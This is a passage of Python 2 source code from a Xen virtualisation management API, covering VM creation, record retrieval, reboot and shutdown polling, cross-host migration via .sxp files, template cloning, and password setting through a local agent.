@raise XendError:
'''
if BNPoolAPI._isMaster:
log.debug(vm_struct)
newuuid = vm_struct.get('uuid', None)
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
vm_label = vm_struct.get('nameLabel')
vms = self.VM_get_by_name_label(session, vm_label)
if vms.get('Value'):
return xen_api_error(['VM name already exists', 'VM', vm_label])
else:
if cmp(host_ref, XendNode.instance().uuid) == 0:
response = self._VM_create(session, vm_struct)
domuuid = response.get('Value')
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(remote_ip, 'VM_create_on', vm_struct, host_ref)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct('vm_create', domuuid, host_ref)
return response
else:
response = self._VM_create(session, vm_struct)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct('vm_create', domuuid, XendNode.instance().uuid)
return response
def VM_create(self, session, vm_struct):
'''
@author: wuyuewen
@summary: A Host range method, create a VM on this Host.
@precondition: vm_struct is legal, vm name not duplicated.
@param session: session of RPC.
@param vm_struct: dict of vm structure
@return: VM.
@rtype: dict.
@raise xen_api_error: VM name already exists
@raise XendError:
'''
if BNPoolAPI._isMaster:
newuuid = vm_struct.get('uuid', None)
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
vm_label = vm_struct.get('nameLabel')
vms = self.VM_get_by_name_label(session, vm_label)
if vms.get('Value'):
return xen_api_error(['VM name already exists', 'VM', vm_label])
else:
response = self._VM_create(session, vm_struct)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct('vm_create', domuuid, XendNode.instance().uuid)
return response
else:
response = self._VM_create(session, vm_struct)
domuuid = response.get('Value')
log.debug("new vm local uuid : %s", domuuid)
if domuuid:
BNPoolAPI.update_data_struct('vm_create', domuuid, XendNode.instance().uuid)
return response
def _VM_create(self, session, vm_struct):
'''
@author: wuyuewen
@summary: Internal method. Create a VM on this Host.
@precondition: vm_struct is legal, vm name not duplicated.
@param session: session of RPC.
@param vm_struct: dict of vm structure
@return: VM.
@rtype: dict.
@raise xen_api_error: VM name already exists
@raise XendError:
'''
xendom = XendDomain.instance()
domuuid = XendTask.log_progress(0, 100,
xendom.create_domain, vm_struct)
return xen_api_success(domuuid)
def _VM_create_check_vm_uuid_unique(self, newuuid):
if newuuid:
return BNPoolAPI.check_vm_uuid_unique(newuuid)
else:
return True
def VM_create_from_vmstruct(self, session, vm_struct):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
domuuid = XendTask.log_progress(0, 100,
xendom.create_domain, vm_struct)
return xen_api_success(domuuid)
def VM_create_from_sxp(self, session, path, start_it=False, update_pool_structs=True):
'''
@author: wuyuewen
@summary: Create a VM on this Host from .sxp file.
@precondition: sxp file is legal, vm name not duplicated.
@param session: session of RPC.
@param path: path of sxp file
@param start_it: Start the VM after create, if start_it=True, Host must have enough free memory.
@return: VM.
@rtype: dict.
@raise xen_api_error: VM name already exists
@raise XendError:
'''
# filename = '/home/share/config.sxp'
try:
sxp_obj = sxp.parse(open(path, 'r'))
sxp_obj = sxp_obj[0]
xendom = XendDomain.instance()
domuuid = XendTask.log_progress(0, 100,
xendom.domain_new, sxp_obj)
if update_pool_structs:
BNPoolAPI.update_data_struct('vm_create', domuuid, XendNode.instance().uuid)
if start_it:
# try:
response = self._VM_start(session, domuuid, False, True)
if cmp(response['Status'], 'Failure') == 0:
self._VM_destroy(session, domuuid, False)
return response
# except Exception, exn:
# self._VM_destroy(session, domuuid, False)
# return xen_api_error(['VM_START_FAILED', 'VM', domuuid])
return response
else:
return xen_api_success(domuuid)
except IOError, e:
return xen_api_error(["Unable to read file: %s" % path])
except Exception, exn:
log.exception(exn)
return xen_api_error(['Create from sxp failed!'])
# finally:
# cmd = 'rm -f %s' % path
# doexec(cmd)
# return XendTask.log_progress(0, 100, do_vm_func,
# "domain_start", domuuid, False, False)
# object methods
def VM_get_record(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's record.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: VM record
@rtype: dict.
@raise xen_api_error: VM not exists
'''
#log.debug('=================vm_get_record:%s' % vm_ref)
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_record(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_record', vm_ref)
else:
return self._VM_get_record(session, vm_ref)
def _VM_get_record(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's record.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: VM record
@rtype: dict.
@raise xen_api_error: VM not exists
'''
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
xennode = XendNode.instance()
if not xeninfo:
log.debug("can not find vm:" + vm_ref)
return xen_api_error(['HANDLE_INVALID', 'VM', vm_ref])
domid = xeninfo.getDomid()
dom_uuid = xeninfo.get_uuid()
record = {
'uuid': dom_uuid,
'power_state': xeninfo.get_power_state(),
'name_label': xeninfo.getName(),
'name_description': xeninfo.getNameDescription(),
'user_version': 1,
'is_a_template': xeninfo.info['is_a_template'],
'is_local_vm' : self._VM_get_is_local_vm(session, vm_ref).get("Value", True),
'ip_addr' : xeninfo.getDomainIp(),
'MAC' : xeninfo.getDomainMAC(),
'auto_power_on': xeninfo.info['auto_power_on'],
'resident_on': XendNode.instance().uuid,
'memory_static_min': xeninfo.get_memory_static_min(),
'memory_static_max': xeninfo.get_memory_static_max(),
'memory_dynamic_min': xeninfo.get_memory_dynamic_min(),
'memory_dynamic_max': xeninfo.get_memory_dynamic_max(),
'VCPUs_params': xeninfo.get_vcpus_params(),
'VCPUs_at_startup': xeninfo.getVCpuCount(),
'VCPUs_max': xeninfo.getVCpuCount(),
'actions_after_shutdown': xeninfo.get_on_shutdown(),
'actions_after_reboot': xeninfo.get_on_reboot(),
'actions_after_suspend': xeninfo.get_on_suspend(),
'actions_after_crash': xeninfo.get_on_crash(),
'consoles': xeninfo.get_consoles(),
'VIFs': xeninfo.get_vifs(),
'VBDs': xeninfo.get_vbds(),
'VTPMs': xeninfo.get_vtpms(),
'DPCIs': xeninfo.get_dpcis(),
'DSCSIs': xeninfo.get_dscsis(),
'DSCSI_HBAs': xeninfo.get_dscsi_HBAs(),
'PV_bootloader': xeninfo.info.get('PV_bootloader'),
'PV_kernel': xeninfo.info.get('PV_kernel'),
'PV_ramdisk': xeninfo.info.get('PV_ramdisk'),
'PV_args': xeninfo.info.get('PV_args'),
'PV_bootloader_args': xeninfo.info.get('PV_bootloader_args'),
'HVM_boot_policy': xeninfo.info.get('HVM_boot_policy'),
'HVM_boot_params': xeninfo.info.get('HVM_boot_params'),
'platform': xeninfo.get_platform(),
'PCI_bus': xeninfo.get_pci_bus(),
'tools_version': xeninfo.get_tools_version(),
'other_config': xeninfo.info.get('other_config', {}),
'tags' : xeninfo.info.get('tags', []),
'domid': domid is None and -1 or domid,
'is_control_domain': xeninfo.info['is_control_domain'],
'metrics': xeninfo.get_metrics(),
'cpu_qos': xeninfo.get_cpu_qos(),
'security_label': xeninfo.get_security_label(),
'crash_dumps': [],
'suspend_VDI' : xennode.get_suspend_VDI(dom_uuid),
'suspend_SR' : xennode.get_suspend_SR(dom_uuid),
'connected_disk_SRs' : xennode.get_connected_disk_sr(dom_uuid),
'connected_iso_SRs' : xennode.get_connected_iso_sr(dom_uuid),
'pool_name': xeninfo.info.get('pool_name'),
# 'cpu_pool' : XendCPUPool.query_pool_ref(xeninfo.get_cpu_pool()),
}
#log.debug(record)
return xen_api_success(record)
# def VM_get_record_lite(self, session, vm_ref=''):
# if BNPoolAPI._isMaster:
# hosts = self.host_get_all(session).get('Value', '')
# node = XendNode.instance()
# records = []
# if hosts:
# for host in hosts:
# if cmp(node.uuid, host) == 0:
# records.append(self._VM_get_record_lite(session))
# else:
# host_ip = BNPoolAPI.get_host_ip(host)
# records.append(xen_rpc_call(host_ip, 'VM_get_record_lite', '').get('Value', []))
# return xen_api_success(records)
# else:
# return xen_api_success(self._VM_get_record_lite(session))
def VM_get_record_lite(self, session, vm_ref=''):
'''
@deprecated: not used
'''
vms = self._VM_get_all(session).get('Value', [])
retv = []
if vms:
for vm_ref in vms:
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
# xennode = XendNode.instance()
if not xeninfo:
log.debug("can not find vm:" + vm_ref)
return xen_api_error(['HANDLE_INVALID', 'VM', vm_ref])
# domid = xeninfo.getDomid()
dom_uuid = xeninfo.get_uuid()
record_lite = {'uuid' : dom_uuid,
'power_state' : xeninfo.get_power_state(),
}
# log.debug(record_lite)
retv.append(record_lite)
return xen_api_success(retv)
def VM_clean_reboot(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Attempt to cleanly reboot the specified VM.
This can only be called when the specified VM is in the Running state.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise XendError: Bad power state.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
response = self._VM_clean_reboot(session, vm_ref)
response = self._VM_reboot_checkout(session, vm_ref)
# self. _VM_set_all_tag(session, vm_ref)
# self._VM_set_all_rate(session, vm_ref, 'rate')
# self._VM_set_all_rate(session, vm_ref, 'burst')
# self.VM_start_set_IO_limit(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(host_ip, "VM_clean_reboot", vm_ref)
return response
else:
response = self._VM_clean_reboot(session, vm_ref)
response = self._VM_reboot_checkout(session, vm_ref)
# self. _VM_set_all_tag(session, vm_ref)
# self._VM_set_all_rate(session, vm_ref, 'rate')
# self._VM_set_all_rate(session, vm_ref, 'burst')
# self.VM_start_set_IO_limit(session, vm_ref)
return response
def _VM_clean_reboot(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Attempt to cleanly reboot the specified VM.
This can only be called when the specified VM is in the Running state.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise XendError: Bad power state.
'''
#self._VM_clean_IO_limit_shutdown(session, vm_ref) #add by wufan
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
XendTask.log_progress(0, 100, xeninfo.shutdown, "reboot")
return xen_api_success_void()
def _VM_reboot_checkout(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Checkout when reboot operation finish, VM_ID = VM_ID + 1.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise Exception: Timeout 90 seconds.
'''
domid_old = self.VM_get_domid(session, vm_ref)['Value']
i = 0
flag = False
one_more = True
while True:
i += 1
domid_new = self.VM_get_domid(session, vm_ref)['Value']
if cmp(int(domid_new), int(domid_old)) > 0:
log.debug('reboot finished: %s, cost time: %s' % (vm_ref, str(i)))
flag = True
break
elif cmp(i, 90) > 0 and cmp(int(domid_new), -1) == 0 or not domid_new:
if one_more:
one_more = False
i -= 6
continue
else:
log.exception('reboot timeout!')
break
else:
time.sleep(1)
continue
return xen_api_success(flag)
def VM_clean_shutdown(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Attempt to cleanly shutdown the specified VM.
This can only be called when the specified VM is in the Running state.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise XendError: Bad power state.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
response = self._VM_clean_shutdown(session,vm_ref)
response = self._VM_shutdown_checkout(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(host_ip, "VM_clean_shutdown", vm_ref)
return response
else:
response = self._VM_clean_shutdown(session, vm_ref)
response = self._VM_shutdown_checkout(session, vm_ref)
return response
def _VM_clean_shutdown(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Attempt to cleanly shutdown the specified VM.
This can only be called when the specified VM is in the Running state.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise XendError: Bad power state.
'''
#self._VM_clean_IO_limit_shutdown(session, vm_ref) #add by wufan
is_a_template = self._VM_get_is_a_template(session, vm_ref).get('Value')
if is_a_template:
return xen_api_error(XEND_API_ERROR_VM_IS_TEMPLATE)
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
XendTask.log_progress(0, 100, xeninfo.shutdown, "poweroff")
return xen_api_success_void()
def _VM_shutdown_checkout(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Checkout when shutdown operation finish.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise Exception: Timeout 90 seconds.
'''
i = 0
time_out = 60
flag = False
while True:
i += 1
# ps_new = self.VM_get_power_state(session, vm_ref)['Value']
domid = self.VM_get_domid(session, vm_ref).get('Value')
# log.debug(ps_new)
if not domid or cmp (int(domid), -1) == 0:
log.debug("shutdown finished: %s, cost time: %s" % (vm_ref, str(i)))
flag = True
break
elif cmp(i, time_out) > 0:
log.exception("shutdown timeout!")
break
else:
time.sleep(1)
continue
return xen_api_success(flag)
'''
when VM create from template, migrate VM to destinate host
VM is shutdown, refer to VM_start_on
'''
def VM_change_host(self, session, vm_ref, temp_ref, host_ref, path):
'''
@author: wuyuewen
@summary: When VM create from template, migrate VM to destinate host, refer to VM_create_on_from_template.
@precondition: VM not running
@param session: session of RPC.
@param vm_ref: VM's uuid
@param temp_ref: VM template uuid
@param host_ref: migrate VM to which host
@return: True | False
@rtype: dict.
@raise xen_api_error: CHANGE_HOST_ON_FAILED
'''
try:
log.debug("in VM_change_host: %s" % vm_ref)
if BNPoolAPI._isMaster:
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
return xen_api_success(True)
xennode = XendNode.instance()
master_uuid = xennode.uuid
h_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if not h_ref:
log.exception('Get host by VM failed! BNPoolAPI update_data_struct not sync!')
h_ref = BNPoolAPI.get_host_by_vm(temp_ref)
h_ip = BNPoolAPI.get_host_ip(h_ref)
host_ip = BNPoolAPI.get_host_ip(host_ref)
paths = xennode.get_ha_sr_location()
log.debug(paths)
# if cmp(paths, {}) !=0:
if paths:
for p in paths.values():
# path = os.path.join(p, CACHED_CONFIG_FILE)
path = os.path.join(p, '%s.sxp' % vm_ref)
break
else:
path = ''
log.debug('vm_migrate to ha path: %s' % path)
# else:
# return xen_api_error(['nfs_ha not mounted', NFS_HA_DEFAULT_PATH])
#copy sxp file to nfs
log.debug("<dest ip>, <host ip>: <%s>, <%s>" % (host_ip, h_ip))
xen_rpc_call(h_ip, 'VM_copy_sxp_to_nfs', vm_ref, path)
if cmp(host_ref, master_uuid) == 0 and cmp(master_uuid, h_ref) == 0:
log.debug("-----condition 1-----")
log.debug("vm dest: master, vm now: master")
response = {'Status' : 'Success', 'Value' : vm_ref}
# return xen_api_success(True)
elif cmp(host_ref, master_uuid) == 0 and cmp(master_uuid, h_ref) != 0:
log.debug("-----condition 2-----")
log.debug("vm dest: master, vm now: node")
response = self.VM_create_from_sxp(session, path, False, False)
# log.debug('create from template: %s' % response)
if cmp (response.get('Status'), 'Success') == 0:
xen_rpc_call(h_ip, 'VM_destroy', vm_ref, False, False, False)
# log.debug('destroy : %s' % response)
elif cmp(host_ref, master_uuid) != 0 and cmp(master_uuid, h_ref) == 0:
log.debug("-----condition 3-----")
log.debug("vm dest: node, vm now: master")
log.debug("host ip (%s) path(%s)" % (host_ip, path))
response = xen_rpc_call(host_ip, 'VM_create_from_sxp', path, False, False)
if cmp (response.get('Status'), 'Success') == 0:
self._VM_destroy(session, vm_ref, False, False)
elif cmp(host_ref, master_uuid) != 0 and cmp(master_uuid, h_ref) != 0:
if cmp(h_ref, host_ref) == 0:
log.debug("-----condition 4-----")
log.debug("vm dest: node1, vm now: node2, node1 = node2")
response = {'Status' : 'Success', 'Value' : vm_ref}
else:
log.debug("-----condition 5-----")
log.debug("vm dest: node1, vm now: node2, node1 != node2")
response = xen_rpc_call(host_ip, 'VM_create_from_sxp', path, False, False)
if cmp (response.get('Status'), 'Success') == 0:
xen_rpc_call(h_ip, 'VM_destroy', vm_ref, False, False, False)
if cmp (response.get('Status'), 'Success') == 0:
BNPoolAPI.update_data_struct('vm_start_on', vm_ref, h_ref, host_ref) # reason here is pre-fixed
log.debug("Finished change host on: %s migrate vm(%s) to %s" % (h_ip, vm_ref, host_ip))
return response
else:
path = ''
return xen_api_success(True)
except Exception, exn:
log.exception(exn)
return xen_api_error(['CHANGE_HOST_ON_FAILED,', exn])
# finally:
# if path:
# cmd = 'rm -f %s' % path
# doexec(cmd)
'''
1.clone vm on the same host of template
2.migrate vm to the destinate host
3.destroy origin vm
'''
def VM_create_on_from_template(self, session, host_ref, vm_ref, newname, config, ping=False):
'''
@author: wuyuewen
@summary: 1. Clone VM from template on the same Host
2. Migrate VM to destinate Host, if migrate success, destroy origin VM on origin Host.
3. Start VM and set VM password, if start VM failed, VM will destroy.
@precondition: 1. Storage has enough space, template structure is legal. See VM_clone_MAC
2. See VM_change_host.
3. Destinate Host has enough free memory, VM already installed Agent for password change. See VM_set_config.
@param session: session of RPC.
@param host_ref: destinate Host
@param vm_ref: VM's uuid
@param newname: name of new VM
@param config: dict type config
@param ping: True | False, VM installed Agent.
True: VM boot into OS then method return
False: VM excute start option and resturn.
@return: True | False
@rtype: dict.
@raise xen_api_error: CHANGE_HOST_ON_FAILED, create vm from template error
'''
# self.__vm_clone_lock__.acquire()
path = None
try:
log.debug('1.vm_create from template>>>>>')
newuuid = config.get('newUuid', None)
mac_addr = config.get('MAC', None)
st1 = time.time()
paths = XendNode.instance().get_ha_sr_location()
log.debug(paths)
if not BNPoolAPI.check_vm(vm_ref):
return xen_api_error(['VM_NOT_FOUND'])
if not BNPoolAPI.check_host(host_ref):
return xen_api_error(['HOST_NOT_FOUND'])
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
if mac_addr and not self._VIF_is_mac_format_legal(mac_addr):
return xen_api_error(['MAC_INVALID'])
# if cmp(paths, {}) !=0:
if paths:
for p in paths.values():
# path = os.path.join(p, CACHED_CONFIG_FILE)
path = os.path.join(p, '%s.sxp' % vm_ref)
break
else:
return xen_api_error(['HA_DIR_NOT_FOUND'])
if not mac_addr:
log.debug('2. vm_clone >>>>>>')
response = self.VM_clone(session, vm_ref, newname, None, newuuid)
else:
log.debug('2. vm_clone_mac >>>>>>')
response = self.VM_clone_MAC(session, vm_ref, newname, mac_addr, None, newuuid)
e1 = (time.time() - st1)
log.debug('VM clone cost time :%s ' % e1)
# log.debug("rpc.VM_start():", e4)
if response.get('Status') == 'Success':
# self.__vm_change_host_lock__.acquire()
# try:
domuuid = response.get('Value')
log.debug('new VM uuid:%s' % domuuid)
# change VM host from cur to host_ref
response = self.VM_change_host(session, domuuid, vm_ref, host_ref, path)
log.debug('change host response: %s' % response)
# finally:
# self.__vm_change_host_lock__.release()
if response.get('Status') == 'Success':
log.debug('3. vm_set_config>>>>>')
response = self.VM_set_config(session, domuuid, config, ping) # when set config failed, VM will be deleted!
e2 = (time.time() - st1)
log.debug(">>>>VM_create_on_from_template<<<< Total cost: %s" % e2)
if response.get('Status') == 'Success':
return response
return xen_api_error(['create vm from template error'])
except Exception, exn:
log.exception(exn)
return xen_api_error(['create vm from template error: %s' % exn])
finally:
if path:
st1 = time.time()
cmd = 'rm -f %s' % path
doexec(cmd)
e1 = (time.time() - st1)
log.debug('remove %s cost: %s' %(path, e1))
# finally:
# self.__vm_clone_lock__.release()
def VM_create_from_template(self, session, vm_ref, newname, config):
'''
@deprecated: not used
'''
log.debug('1.vm_create from template>>>>>')
newuuid = config.get('newUuid', None)
mac_addr = config.get('MAC', None)
st1 = time.time()
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not self._VIF_is_mac_format_legal(mac_addr):
return xen_api_error(['MAC_INVALID'])
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
if not mac_addr:
log.debug('2. vm_clone >>>>>>')
response = self.VM_clone(session, vm_ref, newname, None, newuuid)
else:
log.debug('2. vm_clone_mac >>>>>>')
response = self.VM_clone_MAC(session, vm_ref, newname, mac_addr, None, newuuid)
e1 = (time.time() - st1)
log.debug('VM clone cost time :%s ' % e1)
# log.debug("rpc.VM_start():", e4)
if response.get('Status') == 'Success':
domuuid = response.get('Value')
log.debug('new VM uuid:%s' % domuuid)
log.debug('3. vm_set_config>>>>>')
response = self.VM_set_config(session, domuuid, config) # when set config failed, VM will be deleted!
if response.get('Status') == 'Success':
return response
return xen_api_error(['create vm from template error'])
def VM_create_with_VDI(self, session, host_ref, vm_ref, newname, config, ping=False):
'''
@deprecated: not used
'''
# self.__vm_clone_lock__.acquire()
path = None
try:
storage = self._get_BNStorageAPI_instance()
log.debug('1.vm_create from template>>>>>')
newuuid = config.get('newUuid', None)
mac_addr = config.get('MAC', None)
if not BNPoolAPI.check_vm(vm_ref):
return xen_api_error(['VM_NOT_FOUND'])
if not BNPoolAPI.check_host(host_ref):
return xen_api_error(['HOST_NOT_FOUND'])
if not self._VIF_is_mac_format_legal(mac_addr):
return xen_api_error(['MAC_INVALID'])
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
vdi_new_uuid = config.get('vdiUuid', None)
st1 = time.time()
vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
sys_vdi = self.VM_get_system_VDI(session, vm_ref).get('Value', '')
if not newuuid:
newuuid = genuuid.gen_regularUuid()
vdi_uuid_map = {}
vdis = vdis_resp.get('Value', [])
if vdis:
for vdi in vdis:
vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
if sys_vdi in vdis and vdi_new_uuid:
vdi_uuid_map[sys_vdi] = vdi_new_uuid
paths = XendNode.instance().get_ha_sr_location()
log.debug(paths)
# if cmp(paths, {}) !=0:
if paths:
for p in paths.values():
# path = os.path.join(p, CACHED_CONFIG_FILE)
path = os.path.join(p, '%s.sxp' % vm_ref)
break
else:
return xen_api_error(['HA_DIR_NOT_FOUND'])
if not mac_addr:
log.debug('2. vm_clone >>>>>>')
response = self.VM_clone(session, vm_ref, newname, vdi_uuid_map, newuuid, True)
else:
log.debug('2. vm_clone_mac >>>>>>')
response = self.VM_clone_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid, True)
e1 = (time.time() - st1)
log.debug('VM clone cost time :%s ' % e1)
# log.debug("rpc.VM_start():", e4)
if response.get('Status') == 'Success':
domuuid = response.get('Value')
log.debug('new VM uuid:%s' % domuuid)
# change VM host from cur to host_ref
response = self.VM_change_host(session, domuuid, vm_ref, host_ref, path)
log.debug('change host response: %s' % response)
if response.get('Status') == 'Success':
log.debug('3. vm_set_config>>>>>')
response = self.VM_set_config(session, domuuid, config, ping) # when set config failed, VM will be deleted!
e2 = (time.time() - st1)
log.debug(">>>>VM_create_with_VDI<<<< Total cost: %s" % e2)
if response.get('Status') == 'Success':
return response
return xen_api_error(['create vm from template error'])
except Exception, exn:
log.exception(exn)
return xen_api_success(False)
# finally:
# self.__vm_clone_lock__.release()
def VM_set_passwd(self, session, vm_ref, vm_ip, passwd, origin_passwd, vm_type):
'''
@author: wuyuewen
@summary: VM set password use SSH protocol. The set password agent running in Host, use host 10086 port.
@precondition: Set password Agent is running, windows VM has SSH-Server installed.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param vm_ip: VM's ip
@param passwd: new password
@param origin_passwd: origin password
@param vm_type: windows | linux
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
response = self._VM_set_passwd(session, vm_ref, vm_ip, passwd, origin_passwd, vm_type)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(host_ip, "VM_set_passwd", vm_ref, vm_ip, passwd, origin_passwd, vm_type)
return response
else:
response = self._VM_set_passwd(session, vm_ref, vm_ip, passwd, origin_passwd, vm_type)
return response
def _VM_set_passwd(self, session, vm_ref, vm_ip, passwd, origin_passwd, vm_type ):
'''
@author: wuyuewen
@summary: Internal method. VM set password use SSH protocol. The set password agent running in Host, use host 10086 port.
@precondition: Set password Agent is running, windows VM has SSH-Server installed.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param vm_ip: VM's ip
@param passwd: new password
@param origin_passwd: origin password
@param vm_type: windows | linux
@return: True | False
@rtype: dict.
'''
#log.debug('vm set passwd(%s) ip(%s) origin(%s) new(%s) vm_type(%s)' % (vm_ref, vm_ip, origin_passwd, passwd, vm_type))
# by henry
log.debug('vm set passwd(%s) ip(%s) origin(%s) new(%s) vm_type(%s)' % (vm_ref, vm_ip, "********", "********", vm_type))
is_on = self._test_ip(vm_ip, 3)
if not is_on:
log.debug('vm(%s) ip(%s) cannot ping, try one more time...' % (vm_ref, vm_ip))
is_on = self._test_ip(vm_ip, 3)
if not is_on:
log.debug('Finally, vm(%s) ip(%s) cannot ping' % (vm_ref, vm_ip))
return xen_api_success(False)
proxy = xmlrpclib.Server("http://127.0.0.1:10086")
flag = proxy.VM_set_passwd(vm_ip, passwd, origin_passwd, vm_type)
return xen_api_success(flag)
def VM_set_config(self, session, vm_ref, config, ping=False):
'''
@author: wuyuewen
@summary: Contain several options:
1. set vm vcpu and memory.
2. start vm.
3. ping vm to check if start.
4. set password use SSH protocol or Serial device.
@precondition: Every option has an error handling or rollback option.
1. set vm vcpu and memory error, vm destroy
2. vm cannot start, vm destroy
3. vm cannot ping, vm do not get ip, return error and remain vm to check
4. vm cannot set passwd, return error and remain vm to check
@param session: session of RPC.
@param vm_ref: VM's uuid
@param config: dict type config
@param ping: True | False, ping or donnot ping after start.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM set config error, VM start and change password error.
'''
log.debug("Starting VM_set_config...")
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
log.debug('Master node...')
response = self._VM_set_config(session, vm_ref, config, ping)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(host_ip, "VM_set_config", vm_ref, config, ping)
return response
else:
response = self._VM_set_config(session, vm_ref, config, ping)
return response
def _VM_set_config(self, session, vm_ref, config, ping=False):
'''
@author: wuyuewen
@summary: Internal method. Contain several options:
1. set vm vcpu and memory.
2. start vm.
3. ping vm to check if start.
4. set password use SSH protocol or Serial device.
@precondition: Every option has an error handling or rollback option.
1. set vm vcpu and memory error, vm destroy
2. vm cannot start, vm destroy
3. vm cannot ping, vm do not get ip, return error and remain vm to check
4. vm cannot set passwd, return error and remain vm to check
@param session: session of RPC.
@param vm_ref: VM's uuid
@param config: dict type config
@param ping: True | False, ping or donnot ping after start.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM set config error, VM start and change password error.
'''
time_log = {}
log.debug('vm set config')
MB = 1024*1024
vcpu_num = int(config.get('cpuNumber', 1))
memory_value = int(config.get('memoryValue', 1024))*MB
vlanid = config.get('vlanId', '-1')
IO_read_limit = int(config.get('IOreadLimit', 30))
IO_write_limit = int(config.get('IOwriteLimit', 100))
vm_passwd = config.get('passwd', '')
origin_passwd = config.get('origin_passwd', '')
vm_ip = config.get('IP', '')
vm_type = config.get('type', 'linux')
try:
st1 = time.time()
#1. set cup and memeory
vcpu_max = self._VM_get_VCPUs_max('', vm_ref).get('Value')
if vcpu_num > vcpu_max:
self._VM_set_VCPUs_number_live('', vm_ref, vcpu_num)
self._VM_set_VCPUs_max(session, vm_ref, vcpu_num)
self._VM_set_VCPUs_at_startup(session, vm_ref, vcpu_num)
elif vcpu_num < vcpu_max:
self._VM_set_VCPUs_max(session, vm_ref, vcpu_num)
self._VM_set_VCPUs_number_live('', vm_ref, vcpu_num)
self._VM_set_VCPUs_at_startup(session, vm_ref, vcpu_num)
memory = int(self._VM_get_memory_static_max(session, vm_ref).get('Value'))
log.debug('memory: %s' % memory)
if memory > memory_value:
#log.debug('memory > memory_value: --> %s > %s' % (memory, memory_value))
self._VM_set_memory_dynamic_max(session, vm_ref, memory_value)
self._VM_set_memory_dynamic_min(session, vm_ref, 512*MB)
self._VM_set_memory_static_max(session, vm_ref, memory_value)
elif memory < memory_value:
#log.debug('memory < memory_value: --> %s < %s' % (memory, memory_value))
self._VM_set_memory_static_max(session, vm_ref, memory_value)
self._VM_set_memory_dynamic_max(session, vm_ref, memory_value)
self._VM_set_memory_dynamic_min(session, vm_ref, 512*MB)
#2. set vlanid
#self._VM_set_tag_by_ethnum(session, vm_ref, 0, vlanid)
#log.debug('set tag in other config:>>>>>>>>>>>>>>>>')
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
dominfo.info['other_config'].setdefault('tag',{})
dominfo.info['other_config']['tag']['0'] = vlanid
#self._VM_save(dominfo)
#3. set IO limit
self._VM_set_IO_rate_limit(session, vm_ref, 'write', IO_write_limit, 'MBps')
e1 = time.time() - st1
time_log['set config'] = e1
log.debug('4. finish set vm(%s) vcpu,memeory and io rate limit' % vm_ref)
